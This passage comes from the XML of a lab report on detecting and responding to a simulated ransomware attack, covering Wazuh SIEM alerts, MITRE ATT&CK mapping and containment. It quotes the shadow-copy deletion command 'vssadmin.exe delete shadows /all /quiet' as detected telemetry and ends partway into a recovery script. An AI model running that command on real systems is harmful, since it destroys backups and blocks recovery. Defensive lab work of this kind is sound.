                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_4_ransomware_attack.png" id="67" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3204847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_55acf6534249bf58d041cc682cb255ab8a40730"/>
      <w:r>
        <w:t xml:space="preserve">Phase 4: SIEM Detection Analysis &amp; Visualization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_b36c230bce28958c31aee2190b38c218cdaf05d"/>
      <w:r>
        <w:t xml:space="preserve">A. File Integrity Monitoring (FIM) Detections</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh FIM recorded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">23 real-time file modification events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, catching every file deletion (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 553</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.locked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file addition (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 554</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and the ransom note creation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 550 &amp; 554</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.5: Wazuh Real-Time FIM Table Auditing Encrypted and Deleted Files</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3093664"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Attack Logged 1" title="" id="72" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_5_attack_logged_fim.png" id="73" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3093664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId74">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_2b1da3af0adb5112d1cb2162854c380dc79fe78"/>
      <w:r>
        <w:t xml:space="preserve">B. Custom High-Severity Alert (Rule 100100)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sysmon process creation telemetry captured</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vssadmin.exe delete shadows /all /quiet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">spawned by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wsmprovhost.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(WinRM), triggering custom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule 100100 at Severity Level 14 (CRITICAL)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.6: Level 14 CRITICAL Alert Firing for Volume Shadow Deletion</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3085325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Attack Logged 2" title="" id="77" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_6_attack_logged_rule100100.png" id="78" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3085325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId79">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_82e23d5113af8aecf717473c04f11f9fa0a171d"/>
      <w:r>
        <w:t xml:space="preserve">C. MITRE ATT&amp;CK Matrix Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The incident was correlated directly against the MITRE ATT&amp;CK enterprise matrix, explicitly flagging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1490 (Inhibit System Recovery)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1486 (Data Encrypted for Impact)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.7: Wazuh MITRE ATT&amp;CK Framework Mapping View</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3096443"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Attack Logged 3" title="" id="82" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_7_attack_logged_mitre_framework.png" id="83" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3096443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_2fb4fe66a0782d2c894c70f52c25aee928081da"/>
      <w:r>
        <w:t xml:space="preserve">D. Visual Dashboard Analytics</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The MITRE ATT&amp;CK visual dashboard displayed the alert evolution over time, top tactics donut chart (Impact, Privilege Escalation, Defense Evasion, Credential Access), and technique breakdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.8: Wazuh MITRE ATT&amp;CK Visualization Dashboard</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3096443"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Attack Logged 4" title="" id="87" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_8_attack_logged_mitre_dashboard.png" id="88" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3096443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_0f7a90c66c75828a56c4d164d85cce3600d2e5b"/>
      <w:r>
        <w:t xml:space="preserve">6. Incident Response, Containment &amp; Lossless Data Recovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Following the Level 14 alert, standard incident containment actions were executed on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WinServer-Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_8766cd3642126997406a2cc977503f19708a278"/>
      <w:r>
        <w:t xml:space="preserve">6.1 Containment &amp; Attacker Eviction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host Isolation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Severed external and lateral connectivity to prevent spreading across adjacent network shares (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ADMIN$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Adversary Process Eviction:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Terminated all active WinRM host worker processes (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wsmprovhost.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), immediately terminating the attacker’s Evil-WinRM shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Account Lockdown:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Disabled the compromised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">account to prevent re-authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.1: Executing Host Containment &amp; Process Termination</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3207626"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Containment" title="" id="93" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_1_containment.png" id="94" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3207626"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId95">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.2: Revoking Attacker Remote Access &amp; Disabling Compromised Accounts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3000075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Removing Access of Attacker" title="" id="97" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_6_2_removing_access.png" id="98" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3000075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId99">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="_30cafdd301fe629ade6a1b306e2a698843e149d"/>
      <w:r>
        <w:t xml:space="preserve">6.2 Data Decryption &amp; Restoration Routine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because enterprise standards prohibit paying extortions, an automated SOC decryption utility was executed across</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to reverse the encryption, restore the binary file bytes, and purge the extortion note:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ==========================================================</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SOC DATA RECOVERY &amp; DECRYPTION UTILITY</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ==========================================================</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$targetFolder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Finance"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$lockedFiles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VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$targetFolder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">locked</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">foreach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
